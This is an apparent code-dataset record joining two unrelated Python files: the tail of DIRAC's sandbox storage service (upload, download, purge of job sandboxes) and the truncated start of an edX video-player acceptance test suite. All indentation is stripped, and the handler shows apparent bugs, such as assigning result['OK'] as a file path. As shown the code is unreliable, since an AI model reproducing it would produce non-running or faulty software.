sandboxDB = SandboxMetadataDB()
return S_OK()
class SandboxStoreHandler(RequestHandler):
__purgeCount = -1
__purgeLock = threading.Lock()
__purgeWorking = False
def initialize(self):
self.__backend = self.getCSOption("Backend", "local")
self.__localSEName = self.getCSOption("LocalSE", "SandboxSE")
self.__maxUploadBytes = self.getCSOption("MaxSandboxSizeMiB", 10) * 1048576
if self.__backend.lower() == "local" or self.__backend == self.__localSEName:
self.__useLocalStorage = True
self.__seNameToUse = self.__localSEName
else:
self.__useLocalStorage = False
self.__externalSEName = self.__backend
self.__seNameToUse = self.__backend
# Execute the purge once every 1000 calls
SandboxStoreHandler.__purgeCount += 1
if SandboxStoreHandler.__purgeCount > self.getCSOption("QueriesBeforePurge", 1000):
SandboxStoreHandler.__purgeCount = 0
if SandboxStoreHandler.__purgeCount == 0:
threading.Thread(target=self.purgeUnusedSandboxes).start()
# We need the hostDN used in order to pass these credentials to the
# SandboxStoreDB..
hostCertLocation, _ = Locations.getHostCertificateAndKeyLocation()
hostCert = X509Certificate.X509Certificate()
hostCert.loadFromFile(hostCertLocation)
self.hostDN = hostCert.getSubjectDN().get('Value')
def __getSandboxPath(self, md5):
""" Generate the sandbox path
"""
# prefix = self.getCSOption( "SandboxPrefix", "SandBox" )
prefix = "SandBox"
credDict = self.getRemoteCredentials()
if Properties.JOB_SHARING in credDict['properties']:
idField = credDict['group']
else:
idField = "%s.%s" % (credDict['username'], credDict['group'])
pathItems = ["/", prefix, idField[0], idField]
pathItems.extend([md5[0:3], md5[3:6], md5])
return os.path.join(*pathItems)
def transfer_fromClient(self, fileId, token, fileSize, fileHelper):
"""
Receive a file as a sandbox
"""
if self.__maxUploadBytes and fileSize > self.__maxUploadBytes:
fileHelper.markAsTransferred()
return S_ERROR("Sandbox is too big. Please upload it to a grid storage element")
if isinstance(fileId, (list, tuple)):
if len(fileId) > 1:
assignTo = fileId[1]
fileId = fileId[0]
else:
return S_ERROR("File identified tuple has to have length greater than 1")
else:
assignTo = {}
extPos = fileId.find(".tar")
if extPos > -1:
extension = fileId[extPos + 1:]
aHash = fileId[:extPos]
else:
extension = ""
aHash = fileId
gLogger.info("Upload requested for %s [%s]" % (aHash, extension))
credDict = self.getRemoteCredentials()
sbPath = self.__getSandboxPath("%s.%s" % (aHash, extension))
# Generate the location
result = self.__generateLocation(sbPath)
if not result['OK']:
return result
seName, sePFN = result['Value']
result = sandboxDB.getSandboxId(seName, sePFN, credDict['username'], credDict['group'])
if result['OK']:
gLogger.info("Sandbox already exists. Skipping upload")
fileHelper.markAsTransferred()
sbURL = "SB:%s|%s" % (seName, sePFN)
assignTo = dict([(key, [(sbURL, assignTo[key])]) for key in assignTo])
result = self.export_assignSandboxesToEntities(assignTo)
if not result['OK']:
return result
return S_OK(sbURL)
if self.__useLocalStorage:
hdPath = self.__sbToHDPath(sbPath)
else:
hdPath = False
# Write to local file
result = self.__networkToFile(fileHelper, hdPath)
if not result['OK']:
gLogger.error("Error while receiving sandbox file", "%s" % result['Message'])
return result
hdPath = result['Value']
gLogger.info("Wrote sandbox to file %s" % hdPath)
# Check hash!
if fileHelper.getHash() != aHash:
self.__secureUnlinkFile(hdPath)
gLogger.error("Hashes don't match! Client defined hash is different with received data hash!")
return S_ERROR("Hashes don't match!")
# If using remote storage, copy there!
if not self.__useLocalStorage:
gLogger.info("Uploading sandbox to external storage")
result = self.__copyToExternalSE(hdPath, sbPath)
self.__secureUnlinkFile(hdPath)
if not result['OK']:
return result
sbPath = result['Value'][1]
# Register!
gLogger.info("Registering sandbox in the DB with", "SB:%s|%s" % (self.__seNameToUse, sbPath))
result = sandboxDB.registerAndGetSandbox(credDict['username'], credDict['DN'], credDict['group'],
self.__seNameToUse, sbPath, fileHelper.getTransferedBytes())
if not result['OK']:
self.__secureUnlinkFile(hdPath)
return result
sbURL = "SB:%s|%s" % (self.__seNameToUse, sbPath)
assignTo = dict([(key, [(sbURL, assignTo[key])]) for key in assignTo])
result = self.export_assignSandboxesToEntities(assignTo)
if not result['OK']:
return result
return S_OK(sbURL)
def transfer_bulkFromClient(self, fileId, token, _fileSize, fileHelper):
""" Receive files packed into a tar archive by the fileHelper logic.
token is used for access rights confirmation.
"""
result = self.__networkToFile(fileHelper)
if not result['OK']:
return result
tmpFilePath = result['OK']
gLogger.info("Got Sandbox to local storage", tmpFilePath)
extension = fileId[fileId.find(".tar") + 1:]
sbPath = "%s.%s" % (self.__getSandboxPath(fileHelper.getHash()), extension)
gLogger.info("Sandbox path will be", sbPath)
# Generate the location
result = self.__generateLocation(sbPath)
if not result['OK']:
return result
seName, sePFN = result['Value']
# Register in DB
credDict = self.getRemoteCredentials()
result = sandboxDB.getSandboxId(seName, sePFN, credDict['username'], credDict['group'])
if result['OK']:
return S_OK("SB:%s|%s" % (seName, sePFN))
result = sandboxDB.registerAndGetSandbox(credDict['username'], credDict['DN'], credDict['group'],
seName, sePFN, fileHelper.getTransferedBytes())
if not result['OK']:
self.__secureUnlinkFile(tmpFilePath)
return result
sbid, _newSandbox = result['Value']
gLogger.info("Registered in DB", "with SBId %s" % sbid)
result = self.__moveToFinalLocation(tmpFilePath, sbPath)
self.__secureUnlinkFile(tmpFilePath)
if not result['OK']:
gLogger.error("Could not move sandbox to final destination", result['Message'])
return result
gLogger.info("Moved to final destination")
# Unlink temporal file if it's there
self.__secureUnlinkFile(tmpFilePath)
return S_OK("SB:%s|%s" % (seName, sePFN))
def __generateLocation(self, sbPath):
"""
Generate the location string
"""
if self.__useLocalStorage:
return S_OK((self.__localSEName, sbPath))
# It's external storage
storageElement = StorageElement(self.__externalSEName)
res = storageElement.isValid()
if not res['OK']:
errStr = "Failed to instantiate destination StorageElement"
gLogger.error(errStr, self.__externalSEName)
return S_ERROR(errStr)
result = storageElement.getURL(sbPath)
if not result['OK'] or sbPath not in result['Value']['Successful']:
errStr = "Failed to generate PFN"
gLogger.error(errStr, self.__externalSEName)
return S_ERROR(errStr)
destPfn = result['Value']['Successful'][sbPath]
return S_OK((self.__externalSEName, destPfn))
def __sbToHDPath(self, sbPath):
while sbPath and sbPath[0] == "/":
sbPath = sbPath[1:]
basePath = self.getCSOption("BasePath", "/opt/dirac/storage/sandboxes")
return os.path.join(basePath, sbPath)
def __networkToFile(self, fileHelper, destFileName=False):
"""
Dump incoming network data to temporal file
"""
tfd = None
if not destFileName:
try:
tfd, destFileName = tempfile.mkstemp(prefix="DSB.")
tfd.close()
except Exception as e:
gLogger.error("%s" % repr(e).replace(',)', ')'))
return S_ERROR("Cannot create temporary file")
destFileName = os.path.realpath(destFileName)
mkDir(os.path.dirname(destFileName))
try:
if tfd is not None:
fd = tfd
else:
fd = open(destFileName, "wb")
result = fileHelper.networkToDataSink(fd, maxFileSize=self.__maxUploadBytes)
fd.close()
except Exception as e:
gLogger.error("Cannot open to write destination file", "%s: %s" % (destFileName, repr(e).replace(',)', ')')))
return S_ERROR("Cannot open to write destination file")
if not result['OK']:
return result
return S_OK(destFileName)
def __secureUnlinkFile(self, filePath):
try:
os.unlink(filePath)
except Exception as e:
gLogger.warn("Could not unlink file %s: %s" % (filePath, repr(e).replace(',)', ')')))
return False
return True
def __moveToFinalLocation(self, localFilePath, sbPath):
if self.__useLocalStorage:
hdFilePath = self.__sbToHDPath(sbPath)
result = S_OK((self.__localSEName, sbPath))
if os.path.isfile(hdFilePath):
gLogger.info("There was already a sandbox with that name, skipping copy", sbPath)
else:
hdDirPath = os.path.dirname(hdFilePath)
mkDir(hdDirPath)
try:
os.rename(localFilePath, hdFilePath)
except OSError as e:
errMsg = "Cannot move temporal file to final path"
gLogger.error(errMsg, repr(e).replace(',)', ')'))
result = S_ERROR(errMsg)
else:
result = self.__copyToExternalSE(localFilePath, sbPath)
return result
def __copyToExternalSE(self, localFilePath, sbPath):
"""
Copy uploaded file to external SE
"""
try:
dm = DataManager()
result = dm.put(sbPath, localFilePath, self.__externalSEName)
if not result['OK']:
return result
if 'Successful' not in result['Value']:
gLogger.verbose("Oops, no successful transfers there", str(result))
return S_ERROR("RM returned OK to the action but no successful transfers were there")
okTrans = result['Value']['Successful']
if sbPath not in okTrans:
gLogger.verbose("Ooops, SB transfer wasn't in the successful ones", str(result))
return S_ERROR("RM returned OK to the action but SB transfer wasn't in the successful ones")
return S_OK((self.__externalSEName, okTrans[sbPath]))
except Exception as e:
gLogger.error("Error while moving sandbox to SE", "%s" % repr(e).replace(',)', ')'))
return S_ERROR("Error while moving sandbox to SE")
##################
# Assigning sbs to jobs
types_assignSandboxesToEntities = [dict]
def export_assignSandboxesToEntities(self, enDict, ownerName="", ownerGroup="", entitySetup=False):
"""
Assign sandboxes to jobs.
Expects a dict of { entityId : [ ( SB, SBType ), ... ] }
"""
if not entitySetup:
entitySetup = self.serviceInfoDict['clientSetup']
credDict = self.getRemoteCredentials()
return sandboxDB.assignSandboxesToEntities(enDict, credDict['username'], credDict['group'], entitySetup,
ownerName, ownerGroup)
##################
# Unassign sbs to jobs
types_unassignEntities = [(list, tuple)]
def export_unassignEntities(self, entitiesList, entitiesSetup=False):
"""
Unassign a list of jobs
"""
if not entitiesSetup:
entitiesSetup = self.serviceInfoDict['clientSetup']
credDict = self.getRemoteCredentials()
return sandboxDB.unassignEntities({entitiesSetup: entitiesList}, credDict['username'], credDict['group'])
##################
# Getting assigned sandboxes
types_getSandboxesAssignedToEntity = [basestring]
def export_getSandboxesAssignedToEntity(self, entityId, entitySetup=False):
"""
Get the sandboxes associated to a job and the association type
"""
if not entitySetup:
entitySetup = self.serviceInfoDict['clientSetup']
credDict = self.getRemoteCredentials()
result = sandboxDB.getSandboxesAssignedToEntity(entityId, entitySetup,
credDict['username'], credDict['group'])
if not result['OK']:
return result
sbDict = {}
for SEName, SEPFN, SBType in result['Value']: # pylint: disable=invalid-name
if SBType not in sbDict:
sbDict[SBType] = []
sbDict[SBType].append("SB:%s|%s" % (SEName, SEPFN))
return S_OK(sbDict)
##################
# Disk space left management
types_getFreeDiskSpace = []
def export_getFreeDiskSpace(self):
""" Get the free disk space of the storage element
If no size is specified, terabytes will be used by default.
"""
return getDiskSpace(self.getCSOption("BasePath", "/opt/dirac/storage/sandboxes"))
types_getTotalDiskSpace = []
def export_getTotalDiskSpace(self):
""" Get the total disk space of the storage element
If no size is specified, terabytes will be used by default.
"""
return getDiskSpace(self.getCSOption("BasePath", "/opt/dirac/storage/sandboxes"), total=True)
##################
# Download sandboxes
def transfer_toClient(self, fileID, token, fileHelper):
""" Method to send files to clients.
fileID is the local file name in the SE.
token is used for access rights confirmation.
"""
credDict = self.getRemoteCredentials()
serviceURL = self.serviceInfoDict['URL']
filePath = fileID.replace(serviceURL, '')
result = sandboxDB.getSandboxId(self.__localSEName, filePath, credDict['username'], credDict['group'])
if not result['OK']:
return result
sbId = result['Value']
sandboxDB.accessedSandboxById(sbId)
# If it's a local file
hdPath = self.__sbToHDPath(filePath)
if not os.path.isfile(hdPath):
return S_ERROR("Sandbox does not exist")
result = fileHelper.getFileDescriptor(hdPath, 'rb')
if not result['OK']:
return S_ERROR('Failed to get file descriptor: %s' % result['Message'])
fd = result['Value']
result = fileHelper.FDToNetwork(fd)
fileHelper.oFile.close()
return result
##################
# Purge sandboxes
def purgeUnusedSandboxes(self):
# If a purge is already working skip
SandboxStoreHandler.__purgeLock.acquire()
try:
if SandboxStoreHandler.__purgeWorking:
if time.time() - SandboxStoreHandler.__purgeWorking < 86400:
gLogger.info("Sandbox purge still working")
return S_OK()
SandboxStoreHandler.__purgeWorking = time.time()
finally:
SandboxStoreHandler.__purgeLock.release()
gLogger.info("Purging sandboxes")
result = sandboxDB.getUnusedSandboxes()
if not result['OK']:
gLogger.error("Error while retrieving sandboxes to purge", result['Message'])
SandboxStoreHandler.__purgeWorking = False
return result
sbList = result['Value']
gLogger.info("Got sandboxes to purge", "(%d)" % len(sbList))
for sbId, SEName, SEPFN in sbList: # pylint: disable=invalid-name
self.__purgeSandbox(sbId, SEName, SEPFN)
SandboxStoreHandler.__purgeWorking = False
return S_OK()
def __purgeSandbox(self, sbId, SEName, SEPFN):
result = self.__deleteSandboxFromBackend(SEName, SEPFN)
if not result['OK']:
gLogger.error("Cannot delete sandbox from backend", result['Message'])
return
result = sandboxDB.deleteSandboxes([sbId])
if not result['OK']:
gLogger.error("Cannot delete sandbox from DB", result['Message'])
def __deleteSandboxFromBackend(self, SEName, SEPFN):
gLogger.info("Purging sandbox" "SB:%s|%s" % (SEName, SEPFN))
if SEName != self.__localSEName:
return self.__deleteSandboxFromExternalBackend(SEName, SEPFN)
else:
hdPath = self.__sbToHDPath(SEPFN)
try:
if not os.path.isfile(hdPath):
return S_OK()
except Exception as e:
gLogger.error("Cannot perform isfile", "%s : %s" % (hdPath, repr(e).replace(',)', ')')))
return S_ERROR("Error checking %s" % hdPath)
try:
os.unlink(hdPath)
except Exception as e:
gLogger.error("Cannot delete local sandbox", "%s : %s" % (hdPath, repr(e).replace(',)', ')')))
while hdPath:
hdPath = os.path.dirname(hdPath)
gLogger.info("Checking if dir is empty", hdPath)
try:
if not os.path.isdir(hdPath):
break
if os.listdir(hdPath):
break
gLogger.info("Trying to clean dir", hdPath)
# Empty dir!
os.rmdir(hdPath)
except Exception as e:
gLogger.error("Cannot clean directory", "%s : %s" % (hdPath, repr(e).replace(',)', ')')))
break
return S_OK()
def __deleteSandboxFromExternalBackend(self, SEName, SEPFN):
if self.getCSOption("DelayedExternalDeletion", True):
gLogger.info("Setting deletion request")
try:
# use the host authentication to fetch the data
result = sandboxDB.getSandboxOwner(SEName, SEPFN, self.hostDN, 'hosts')
if not result['OK']:
return result
_owner, ownerDN, ownerGroup = result['Value']
request = Request()
request.RequestName = "RemoteSBDeletion:%s|%s:%s" % (SEName, SEPFN, time.time())
request.OwnerDN = ownerDN
request.OwnerGroup = ownerGroup
physicalRemoval = Operation()
physicalRemoval.Type = "PhysicalRemoval"
physicalRemoval.TargetSE = SEName
fileToRemove = File()
fileToRemove.PFN = SEPFN
physicalRemoval.addFile(fileToRemove)
request.addOperation(physicalRemoval)
return ReqClient().putRequest(request)
except Exception as e:
gLogger.exception("Exception while setting deletion request")
return S_ERROR("Cannot set deletion request: %s" % str(e))
else:
gLogger.info("Deleting external Sandbox")
try:
return StorageElement(SEName).removeFile(SEPFN)
except Exception as e:
gLogger.exception("RM raised an exception while trying to delete a remote sandbox")
return S_ERROR("RM raised an exception while trying to delete a remote sandbox")
|
andresailer/DIRAC
|
WorkloadManagementSystem/Service/SandboxStoreHandler.py
|
Python
|
gpl-3.0
| 19,330
|
[
"DIRAC"
] |
250eedfded71af5e1020270cce21aa7d84525e4cc11ab3ee68b7f4c3862cf812
|
# -*- coding: utf-8 -*-
"""
Acceptance tests for Video.
"""
import os
from unittest import skipIf
from ddt import data, ddt, unpack
from mock import patch
from nose.plugins.attrib import attr
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from common.test.acceptance.fixtures.course import CourseFixture, XBlockFixtureDesc
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.course_info import CourseInfoPage
from common.test.acceptance.pages.lms.courseware import CoursewarePage
from common.test.acceptance.pages.lms.tab_nav import TabNavPage
from common.test.acceptance.pages.lms.video.video import VideoPage
from common.test.acceptance.tests.helpers import (
UniqueCourseTest,
YouTubeStubConfig,
is_youtube_available,
skip_if_browser
)
VIDEO_SOURCE_PORT = 8777
VIDEO_HOSTNAME = os.environ.get('BOK_CHOY_HOSTNAME', 'localhost')
HTML5_SOURCES = [
'http://{}:{}/gizmo.mp4'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
'http://{}:{}/gizmo.webm'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
'http://{}:{}/gizmo.ogv'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
]
HTML5_SOURCES_INCORRECT = [
'http://{}:{}/gizmo.mp99'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
]
HLS_SOURCES = [
'http://{}:{}/hls/history.m3u8'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
]
@skipIf(is_youtube_available() is False, 'YouTube is not available!')
class VideoBaseTest(UniqueCourseTest):
"""
Base class for tests of the Video Player
Sets up the course and provides helper functions for the Video tests.
"""
def setUp(self):
"""
Initialization of pages and course fixture for video tests
"""
super(VideoBaseTest, self).setUp()
self.longMessage = True # pylint: disable=invalid-name
self.video = VideoPage(self.browser)
self.tab_nav = TabNavPage(self.browser)
self.courseware_page = CoursewarePage(self.browser, self.course_id)
self.course_info_page = CourseInfoPage(self.browser, self.course_id)
self.auth_page = AutoAuthPage(self.browser, course_id=self.course_id)
self.course_fixture = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
self.metadata = None
self.assets = []
self.contents_of_verticals = None
self.youtube_configuration = {}
self.user_info = {}
# reset youtube stub server
self.addCleanup(YouTubeStubConfig.reset)
def navigate_to_video(self):
""" Prepare the course and get to the video and render it """
self._install_course_fixture()
self._navigate_to_courseware_video_and_render()
def navigate_to_video_no_render(self):
"""
Prepare the course and get to the video unit
however do not wait for it to render, because
the has been an error.
"""
self._install_course_fixture()
self._navigate_to_courseware_video_no_render()
def _install_course_fixture(self):
""" Install the course fixture that has been defined """
if self.assets:
self.course_fixture.add_asset(self.assets)
chapter_sequential = XBlockFixtureDesc('sequential', 'Test Section')
chapter_sequential.add_children(*self._add_course_verticals())
chapter = XBlockFixtureDesc('chapter', 'Test Chapter').add_children(chapter_sequential)
self.course_fixture.add_children(chapter)
self.course_fixture.install()
if len(self.youtube_configuration) > 0:
YouTubeStubConfig.configure(self.youtube_configuration)
def _add_course_verticals(self):
"""
Create XBlockFixtureDesc verticals
:return: a list of XBlockFixtureDesc
"""
xblock_verticals = []
_contents_of_verticals = self.contents_of_verticals
# Video tests require at least one vertical with a single video.
if not _contents_of_verticals:
_contents_of_verticals = [[{'display_name': 'Video', 'metadata': self.metadata}]]
for vertical_index, vertical in enumerate(_contents_of_verticals):
xblock_verticals.append(self._create_single_vertical(vertical, vertical_index))
return xblock_verticals
def _create_single_vertical(self, vertical_contents, vertical_index):
"""
Create a single course vertical of type XBlockFixtureDesc with category `vertical`.
A single course vertical can contain single or multiple video modules.
:param vertical_contents: a list of items for the vertical to contain
:param vertical_index: index for the vertical display name
:return: XBlockFixtureDesc
"""
xblock_course_vertical = XBlockFixtureDesc('vertical', 'Test Vertical-{0}'.format(vertical_index))
for video in vertical_contents:
xblock_course_vertical.add_children(
XBlockFixtureDesc('video', video['display_name'], metadata=video.get('metadata')))
return xblock_course_vertical
def _navigate_to_courseware_video(self):
""" Register for the course and navigate to the video unit """
self.auth_page.visit()
self.user_info = self.auth_page.user_info
self.courseware_page.visit()
def _navigate_to_courseware_video_and_render(self):
""" Wait for the video player to render """
self._navigate_to_courseware_video()
self.video.wait_for_video_player_render()
def _navigate_to_courseware_video_no_render(self):
""" Wait for the video Xmodule but not for rendering """
self._navigate_to_courseware_video()
self.video.wait_for_video_class()
def metadata_for_mode(self, player_mode, additional_data=None):
"""
Create a dictionary for video player configuration according to `player_mode`
:param player_mode (str): Video player mode
:param additional_data (dict): Optional additional metadata.
:return: dict
"""
metadata = {}
youtube_ids = {
'youtube_id_1_0': '',
'youtube_id_0_75': '',
'youtube_id_1_25': '',
'youtube_id_1_5': '',
}
if player_mode == 'html5':
metadata.update(youtube_ids)
metadata.update({
'html5_sources': HTML5_SOURCES
})
if player_mode == 'youtube_html5':
metadata.update({
'html5_sources': HTML5_SOURCES,
})
if player_mode == 'youtube_html5_unsupported_video':
metadata.update({
'html5_sources': HTML5_SOURCES_INCORRECT
})
if player_mode == 'html5_unsupported_video':
metadata.update(youtube_ids)
metadata.update({
'html5_sources': HTML5_SOURCES_INCORRECT
})
if player_mode == 'hls':
metadata.update(youtube_ids)
metadata.update({
'html5_sources': HLS_SOURCES,
})
if player_mode == 'html5_and_hls':
metadata.update(youtube_ids)
metadata.update({
'html5_sources': HTML5_SOURCES + HLS_SOURCES,
})
if additional_data:
metadata.update(additional_data)
return metadata
def go_to_sequential_position(self, position):
"""
Navigate to sequential specified by `video_display_name`
"""
self.courseware_page.go_to_sequential_position(position)
self.video.wait_for_video_player_render()
@attr(shard=13)
@ddt
class YouTubeVideoTest(VideoBaseTest):
""" Test YouTube Video Player """
def test_youtube_video_rendering_wo_html5_sources(self):
"""
Scenario: Video component is rendered in the LMS in Youtube mode without HTML5 sources
Given the course has a Video component in "Youtube" mode
Then the video has rendered in "Youtube" mode
"""
self.navigate_to_video()
# Verify that video has rendered in "Youtube" mode
self.assertTrue(self.video.is_video_rendered('youtube'))
def test_transcript_button_wo_english_transcript(self):
"""
Scenario: Transcript button works correctly w/o english transcript in Youtube mode
Given the course has a Video component in "Youtube" mode
And I have defined a non-english transcript for the video
And I have uploaded a non-english transcript file to assets
Then I see the correct text in the captions
"""
data = {'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('youtube', data)
self.assets.append('chinese_transcripts.srt')
self.navigate_to_video()
self.video.show_captions()
# Verify that we see "好 各位同学" text in the transcript
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_cc_button(self):
"""
Scenario: CC button works correctly with transcript in YouTube mode
Given the course has a video component in "Youtube" mode
And I have defined a transcript for the video
Then I see the closed captioning element over the video
"""
data = {'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('youtube', data)
self.assets.append('chinese_transcripts.srt')
self.navigate_to_video()
# Show captions and make sure they're visible and cookie is set
self.video.show_closed_captions()
self.video.wait_for_closed_captions()
self.assertTrue(self.video.is_closed_captions_visible)
self.video.reload_page()
self.assertTrue(self.video.is_closed_captions_visible)
# Hide captions and make sure they're hidden and cookie is unset
self.video.hide_closed_captions()
self.video.wait_for_closed_captions_to_be_hidden()
self.video.reload_page()
self.video.wait_for_closed_captions_to_be_hidden()
def test_transcript_button_transcripts_and_sub_fields_empty(self):
"""
Scenario: Transcript button works correctly if transcripts and sub fields are empty,
but transcript file exists in assets (Youtube mode of Video component)
Given the course has a Video component in "Youtube" mode
And I have uploaded a .srt.sjson file to assets
Then I see the correct english text in the captions
"""
self._install_course_fixture()
self.course_fixture.add_asset(['subs_3_yD_cEKoCk.srt.sjson'])
self.course_fixture._upload_assets()
self._navigate_to_courseware_video_and_render()
self.video.show_captions()
# Verify that we see "Welcome to edX." text in the captions
self.assertIn('Welcome to edX.', self.video.captions_text)
def test_transcript_button_hidden_no_translations(self):
"""
Scenario: Transcript button is hidden if no translations
Given the course has a Video component in "Youtube" mode
Then the "Transcript" button is hidden
"""
self.navigate_to_video()
self.assertFalse(self.video.is_button_shown('transcript_button'))
def test_fullscreen_video_alignment_with_transcript_hidden(self):
"""
Scenario: Video is aligned with transcript hidden in fullscreen mode
Given the course has a Video component in "Youtube" mode
When I view the video at fullscreen
Then the video with the transcript hidden is aligned correctly
"""
self.navigate_to_video()
# click video button "fullscreen"
self.video.click_player_button('fullscreen')
# check if video aligned correctly without enabled transcript
self.assertTrue(self.video.is_aligned(False))
def test_download_button_wo_english_transcript(self):
"""
Scenario: Download button works correctly w/o english transcript in YouTube mode
Given the course has a Video component in "Youtube" mode
And I have defined a downloadable non-english transcript for the video
And I have uploaded a non-english transcript file to assets
Then I can download the transcript in "srt" format
"""
data = {'download_track': True, 'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
self.assets.append('chinese_transcripts.srt')
# go to video
self.navigate_to_video()
# check if we can download transcript in "srt" format that has text "好 各位同学"
unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
def test_download_button_two_transcript_languages(self):
"""
Scenario: Download button works correctly for multiple transcript languages
Given the course has a Video component in "Youtube" mode
And I have defined a downloadable non-english transcript for the video
And I have defined english subtitles for the video
Then I see the correct english text in the captions
And the english transcript downloads correctly
And I see the correct non-english text in the captions
And the non-english transcript downloads correctly
"""
self.assets.extend(['chinese_transcripts.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'download_track': True, 'transcripts': {'zh': 'chinese_transcripts.srt'}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
# check if "Welcome to edX." text in the captions
self.assertIn('Welcome to edX.', self.video.captions_text)
# check if we can download transcript in "srt" format that has text "Welcome to edX."
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', 'Welcome to edX.'))
# select language with code "zh"
self.assertTrue(self.video.select_language('zh'))
# check if we see "好 各位同学" text in the captions
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
# check if we can download transcript in "srt" format that has text "好 各位同学"
unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
def test_fullscreen_video_alignment_on_transcript_toggle(self):
"""
Scenario: Video is aligned correctly on transcript toggle in fullscreen mode
Given the course has a Video component in "Youtube" mode
And I have uploaded a .srt.sjson file to assets
And I have defined subtitles for the video
When I view the video at fullscreen
Then the video with the transcript enabled is aligned correctly
And the video with the transcript hidden is aligned correctly
"""
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
data = {'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
# make sure captions are opened
self.video.show_captions()
# click video button "fullscreen"
self.video.click_player_button('fullscreen')
# check if video aligned correctly with enabled transcript
self.assertTrue(self.video.is_aligned(True))
# click video button "transcript"
self.video.click_player_button('transcript_button')
# check if video aligned correctly without enabled transcript
self.assertTrue(self.video.is_aligned(False))
def test_video_rendering_with_default_response_time(self):
"""
Scenario: Video is rendered in Youtube mode when the YouTube Server responds quickly
Given the YouTube server response time less than 1.5 seconds
And the course has a Video component in "Youtube_HTML5" mode
Then the video has rendered in "Youtube" mode
"""
# configure youtube server
self.youtube_configuration['time_to_response'] = 0.4
self.metadata = self.metadata_for_mode('youtube_html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('youtube'))
def test_video_rendering_wo_default_response_time(self):
"""
Scenario: Video is rendered in HTML5 when the YouTube Server responds slowly
Given the YouTube server response time is greater than 1.5 seconds
And the course has a Video component in "Youtube_HTML5" mode
Then the video has rendered in "HTML5" mode
"""
# configure youtube server
self.youtube_configuration['time_to_response'] = 7.0
self.metadata = self.metadata_for_mode('youtube_html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
def test_video_with_youtube_blocked_with_default_response_time(self):
"""
Scenario: Video is rendered in HTML5 mode when the YouTube API is blocked
Given the YouTube API is blocked
And the course has a Video component in "Youtube_HTML5" mode
Then the video has rendered in "HTML5" mode
And only one video has rendered
"""
# configure youtube server
self.youtube_configuration.update({
'youtube_api_blocked': True,
})
self.metadata = self.metadata_for_mode('youtube_html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
# The video should only be loaded once
self.assertEqual(len(self.video.q(css='video')), 1)
def test_video_with_youtube_blocked_delayed_response_time(self):
"""
Scenario: Video is rendered in HTML5 mode when the YouTube API is blocked
Given the YouTube server response time is greater than 1.5 seconds
And the YouTube API is blocked
And the course has a Video component in "Youtube_HTML5" mode
Then the video has rendered in "HTML5" mode
And only one video has rendered
"""
# configure youtube server
self.youtube_configuration.update({
'time_to_response': 2.0,
'youtube_api_blocked': True,
})
self.metadata = self.metadata_for_mode('youtube_html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
# The video should only be loaded once
self.assertEqual(len(self.video.q(css='video')), 1)
def test_html5_video_rendered_with_youtube_captions(self):
"""
Scenario: User should see Youtube captions for If there are no transcripts
available for HTML5 mode
Given that I have uploaded a .srt.sjson file to assets for Youtube mode
And the YouTube API is blocked
And the course has a Video component in "Youtube_HTML5" mode
And Video component rendered in HTML5 mode
And Html5 mode video has no transcripts
When I see the captions for HTML5 mode video
Then I should see the Youtube captions
"""
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
# configure youtube server
self.youtube_configuration.update({
'time_to_response': 2.0,
'youtube_api_blocked': True,
})
data = {'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube_html5', additional_data=data)
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
# check if caption button is visible
self.assertTrue(self.video.is_button_shown('transcript_button'))
self._verify_caption_text('Welcome to edX.')
@data(('srt', '00:00:00,260'), ('txt', 'Welcome to edX.'))
@unpack
def test_download_transcript_links_work_correctly(self, file_type, search_text):
"""
Scenario: Download 'srt' transcript link works correctly.
Download 'txt' transcript link works correctly.
Given the course has Video components A and B in "Youtube" mode
And Video component C in "HTML5" mode
And I have defined downloadable transcripts for the videos
Then I can download a transcript for Video A in "srt" format
And the Download Transcript menu does not exist for Video C
"""
data_a = {'sub': '3_yD_cEKoCk', 'download_track': True}
youtube_a_metadata = self.metadata_for_mode('youtube', additional_data=data_a)
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
data_b = {'youtube_id_1_0': 'b7xgknqkQk8', 'sub': 'b7xgknqkQk8', 'download_track': True}
youtube_b_metadata = self.metadata_for_mode('youtube', additional_data=data_b)
self.assets.append('subs_b7xgknqkQk8.srt.sjson')
data_c = {'track': 'http://example.org/', 'download_track': True}
html5_c_metadata = self.metadata_for_mode('html5', additional_data=data_c)
self.contents_of_verticals = [
[{'display_name': 'A', 'metadata': youtube_a_metadata}],
[{'display_name': 'B', 'metadata': youtube_b_metadata}],
